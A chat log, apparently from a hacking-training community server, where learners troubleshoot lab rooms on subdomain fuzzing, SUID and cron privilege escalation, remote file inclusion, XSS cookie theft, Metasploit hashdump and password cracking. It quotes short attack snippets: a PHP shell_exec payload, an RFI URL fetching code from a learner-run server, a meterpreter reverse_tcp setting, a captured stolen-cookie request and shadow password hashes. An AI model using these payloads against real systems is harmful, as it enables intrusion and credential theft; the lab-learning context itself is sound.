Is anyone having OpenVPN issue? I even tried to redownload but it gives me a 404 an error occurred. Trying to get through the Jr. Pen Testing.

@alpine wyvern try switching VPN server, VIP servers sometimes have issues

Well ignore the ~

I hate that thing. Its always popping up right before I hit enter.

The complete begginer one? Ive worked in networks and Im a developer atm. So I dont know if I need that

you can do the JR Penetrtation Tester, you can win prices there and it covers a lot of basic pentesting TTP's

Thanks man!

Gave +1 Rep to @steel nymph

Thank you :)

Can anyone help me with task 6 in the subdomain enumeration room? 😅
I ran the ffuf command || with 472 after -fs || but it's not returning the subdomain

Thank you! Its running the scan now 🙂

Gave +1 Rep to @steel nymph

@steel nymph the given command is:
user@machine$ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://MACHINE_IP -fs {size}

and I typed in:
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host:FUZZ.acmeitsupport.thm" -u http://10.10.27.150 -fs 472

nope nothing my output looks like Fenris's though

is it actually ur wordlist path?

try to run without fs

check the wordlist path if you aint using the attackbox

Is 472 the most occurring size value from the previous result? (Not by me)

And how does your output without the -fs flag look like?

Try to run your command without -fs parameter than think which size u should ignore at your next search for more clear results and add this size with -fs command

@modest arch I can't post a picture for some reason but my output looks like this ||and the size for each one is 472||

alright I'll give it another try

So what I did to fix it is just jump to the next task and re open a new machine and then attack box. use the machine IP and not the attack box ip. you can go back and do that task 6 again that way

🤔
Alright I'll give that a try as well! Since I've had mine open for quite some time from other tasks

Hello guys im getting some troubles with the SUID PrivESC of Linux room, may I get some help? I've tried: fnd / -type f -perm -04000 -ls 2>/dev/null which lists the files that have the SUID bit set, however nano doesn't appear in those files even tho the example is using nano, and also none of the files seems to be exploitable following gtfobins, only base64 but it won't allow me to exploit it since i cant use sudo, may i get some hint? Ty in advice!

Nano was just an example used. You can exploit base64 with SUID. Check gtfobins

Okay, thank you, ill try it!!

Gave +1 Rep to @drifting drum

can anyone help with file inclusion the last task

What about it?

@drifting drum this is what I get back

@pearl compass think I could ask you for help on challenge 3?

You're trying to do LFI on a page that wants you to perform RFI

What do you need help with?

I struggled on it a couple days ago, I'll come back to you in like 5 minutes to make sure I can describe what I was running into properly.

Read what the page said wrong.

i set up the || cmd.txt file and the server in the terminal and I used this in the browser bar to execute, http://10.10.114.253/playground.php?file=http://10.10.54.251:8000/cmd.txt||

You can't expect a .txt file to be ran as code

Because it's not code

It's just text

If you want your code to be ran, you'll need to actually supply code

Most webservers can interpret php. So you'll probably wanna use that

I put || <?php echo shell_exec("hostname");?> ||

inside the text document

Yea,but you called it .txt

Which means it's interpreted as text

Really? I thought it dosent

Good point

@steel nymph || <?php echo shell_exec("hostname");?> ||

I'd have to look

the server || python command isnt running in the command line so id have to fix that as weel||

well

I cant get that command to work on the attack box or the kali vm

Hello everyone, I'm having an issue with john the ripper and section 7 of the Linux PrivEsc chapter. I collected the passwd and shadow files and fed them john and retrieved the gerry user accounts password but not user2's, I do however know the password to user2 is in the wordlist. I'm also fairly confident I set the type correctly as sha512crypt... any ideas as to why john is not working for me?

indeed

I was able to get 1 out of 3 user accounts, alas not the one I needed

I tried, only shows 1 cracked hash and 2 uncracked

|| test ||

ok

@steel nymph i tried the simplehttpserver and it returned: no module named simplehttpserver

|| gerryconway:$6$vgzgxM3ybTlB.wkV$48YDY7qQnp4purOJ19mxfMOwKt.H2LaWKPu0zKlWKaUMG1N7weVzqobp65RxlMIZ/NirxeZdOJMEOp3ofE.RT/:1001:1001::/home/gerryconway:/bin/sh
user2:$6$m6VmzKTbzCD/.I10$cKOvZZ8/rsYwHd.pE099ZRwM686p/Ep13h7pFMBCG4t7IukRqc/fXlA1gHXh9F2CbwmD4Epi1Wgh.Cl.VV1mb/:1002:1002::/home/user2:/bin/sh
karen:$6$VjcrKz/6S8rhV4I7$yboTb0MExqpMXW0hjEJgqLWs/jGPJA7N/fEoPMuYLY1w16FwL7ECCbQWJqYLGpy.Zscna9GILCSaNLJdBP1p8/:1003:1003::/home/karen:/bin/sh ||

|| john -w /usr/share/wordlists/rockyou.txt --format=Sha512crypt unshadow.txt ||

tried that too, it runs as tricode

its so weird

i even know the passwords and know they are in the wordlist

I wish I knew what it was

I tried on both the attack boxes

about to spin up my own vm

i think I did last night but I'll try again

@steel nymph i got the server to work on 1337 and im guessing i need to use the same port on the address to

Giving up on SSRF Room 😑

Making some silly mistake @steel nymph 😑

@drifting drum .... thanks anyway... i went back through the other challenges and figured it out. /facepalm

Gave +1 Rep to @drifting drum

Yes I Can see the changes but no idea what to change 😑

Hey, i'm doing the Junior Penetration Tester path, and i'm in the xss module task 8, i have the problem that there are no "staff" actions happening here like expected. I dont get the http request from the server only the dns, the xss code is right, because i can see the request when i open the tickets self instead the "staff"

restarted 4 times...

waited different times, tested on nc and 10.10.10.100

yea, but we need the flag to complete the room

really... after restarting 5 times and frustrating over an hour now...

GET /?cookie=YWRtaW49ZmFsc2U7IHNlc3Npb249YmUzZDE1OGUzY2RlODIxOGNmNGNjMTExNTcyYzY0YjU= HTTP/1.1

its only my own, does someone can pm me the flag? thanks

So, for the 4th challenge on task 8 of file inclusion, am I supposed to establish a reverse shell to gather the hostname flag? or, am I supposed to just supply code for it to display in a curl response / on the web page?

@steel nymph I was trying to use the php reverse shell from the reverse shell cheatsheet and can't seem to get it to phone home, and I'm not quite sure where I'm going wrong. I've set up a couple other reverse shells, and I have the http server up and running so the file should be reachable, but I'm not getting any response on my nc listener.

Yeah... I think there's an error with the shell code.

last question of the metasploit module.... i have a meterpreter session, but how do i get hashdump to work here? It asks for a session...

Background your meterpreter session, enter sessions while in the msfconsole and set the session option for the hasdump to the number of the session.

Hi! Any idea of why the crontab PrivEsc in linux may not be working?

I just changed any of the root files for a reverse shell and started the nc listener in the atacking machine but is not working

ok im going to try this....

thanks

Oh dear...

that must be it

it seems stuck here

am i doing something wrong

yeah def that was it, working now, thx for helping always dude

Gave +1 Rep to @tulip elm

you can do it two different ways, if its a windows, you gotta make sure you're running on an NT AUTHORITY SYSTEM process if im not wrong and also you can use just hashdump in the meterpreter or using a post/windows/gather/hashdump and link it to the meterpreter session, if its a linux you gotta use the post/linux/gather/hashdump module and link it to the meterpreter session

Ah yeah this one was tricky

you can also try to load kiwi and use mimikatz but i didnt need to

yup yup i get the module i need to use, i just cant get to it from here

maybe you're having the same issue as i had, you're in the msfvenom module?

yes

yup

my issue was i wasnt using the same payload in the meterpreter as in the msfvenom payload

check it out

yeah i set that

that was making the session unstable and not able to work with the post module

||set payload linux/x86/meterpreter/reverse_tcp
||

are you getting any error?

no errors, just not backgrounding

hold up

do you get a reverse shell at all?

nah still no prompt

yea

Uhm, well you could try to run the initial exploit where you get the meterpreter session with run -j (I believe it was to run it as a background job) so that it will be in the background already.

ah

ok let me try

if that doesn't work either restart the machines and hit me up in dm so i can try to help you if u want to

ooooo

hang on hang on lads, i think we are getting somewhere

omg, thanks everyone, it worked

I just want to return all the help that i've got during my path

😎

Nice! What was it?

just the session wasn't backgrounding properly. -j helped

Nice!

Glad it worked

me too! is 00:30 and im up in 6 hours, i better goto sleep

nite and thanks again

Nite P:

@steel nymph i figured it out. was an error in the php shell code, i think i accidentally deleted a semicolon.

I am in the Attactive Directory room and when I try to run GetNPUsers.py I am getting this error:

python3 GetNPUsers.py spookysec.local/svc-admin -no-pass 1 ⚙
Impacket v0.9.24.dev1+20211026.122819.ea023b28 - Copyright 2021 SecureAuth Corporation

[*] Getting TGT for svc-admin
[-] [Errno Connection error (SPOOKYSEC.LOCAL:88)] [Errno -2] Name or service not known

This has happened on my VM as well as my kali desktop and the THM browser. Has anyone else ran into this problem?

did you get this resolved?

Hey can anyone help me

super quick question

You would get your answer faster if you ask it right away 🙂

@urban snow yes I did thank you for reaching out

Gave +1 Rep to @urban snow

Not sure this belong to this room, but have you set your hosts file?

Using burpsuite to change the method tofrom get to post and putting file in but not getting a file output

file inclusion task 8 flag 1

if you change get to post you also need to modify where you put the file name

also in the request?

https://www.w3schools.com/tags/ref_httpmethods.asp

yes and you need to add a content type

so is this something that is needed everytime i try and use this type of attack

also im not getting the flag i just get a warning

Yes and if you are not getting the flag there is something wrong with your request

you can also look at this link https://stackoverflow.com/questions/14551194/how-are-parameters-sent-in-an-http-post-request

what warning do you get?

I have to start a new machine it may have been that i will let you know in a second

ok

im just getting that there is no file in the directory

so im thinking that im putting it in the wrong spot or just doing something completely wrong

Hi,
Regarding the XSS room (Jr Pen. Tester path):
The last task seems broken. Is it just for me?
The request catcher doesn't get any HTML requests (only DNS) and a netcat listener on my local machine only gets my own cookie instead od the staff-cookie.

Can anyone please help?
Thx!

used %00 and it worked

👍

I think you need to wait a bit

Waited for more than 15 minutes.
I also tried to create another account / another request catcher instances.
This seems really buggy :(

I have just checked, it works fine

took a few tries but I got it to work as well

Hi guys, did anyone ran into a ffuf not giving results in "Authentication Bypass" room? (task 3)

Hi everyone, so I am trying to complete the "Walking Application Room" but I keep running into an issue. When I run on my Kali, it says packet filtered even though I have connected using openvpn

but tryhackme attackbox, it pings correctly. What do you recommend i do to fix the issue on my Kali?

Make sure your valid_usernames.txt doesn’t have any spaces after the names

Task 4 curl 2 requests, the curl command is properly typed in, I can’t get the green popup to say that the password reset email sent to attacker@hacker.com

I fixed it nvm

Hi everyone , I need your help. After starting the machine on "Content Discovery". When I try to open the link I get 'ERR_CONNECTION_TIMED_OUT' or browser cannot connect to server . How do I resolve this ? @primal whale , @heavy night

ssrf task 2 is somewhat difficult for me
nvm, solved

Restart the machine, and use the attack box provided and the link provided in the exercise by tryhackme, worked immediately

Wow that blind time based SQL injection took me so long to realize the issue, but if anyone gets stuck on that last task, remember to remove the table/column enumeration code and just do the account code standalone, not sure if it's just my brain that struggled with that or what

is anyone having problem with the server? i am doing Linux PrivEsc Cron. Tried using attackbox but getting connection error. Tried using my kali machine and can't get a reverse shell

Same

Trying to finish this tonight

I am using the attackbox. Still getting connection error

The one in the web browser? I know sometimes when I try to use my VM on some rooms it bugs out and I have to use the THM provided box.

I've been going for the past 2 hours without issues on a Kali box, but I've been working slowly

oh now attackbox is working.

spoke too soon.. sigh

Did you use netcat or the link of tryhackme? On the attack box

i use nc on my kali vm. still can't connect to attackbox

Eyyy just reached top 1% rank

@noble rose @zealous marsh . It’s now working okay !!

Maybe it was my home wifi, currently using the office wifi .

Thank you for posting this... I'm not sure why but ||table_name like 'a_a_y_i_s%';--|| was working for me and I was like "wow this can't be right" 😂

Gave +1 Rep to @small scroll

https://tryhackme.com/room/winprivesc task6 how to tranfser the executablefile to windows ? as wget is not working

Anyone has done the Linux Privesc room?

yep!

are u stuck somewhere?

yes, can I DM you?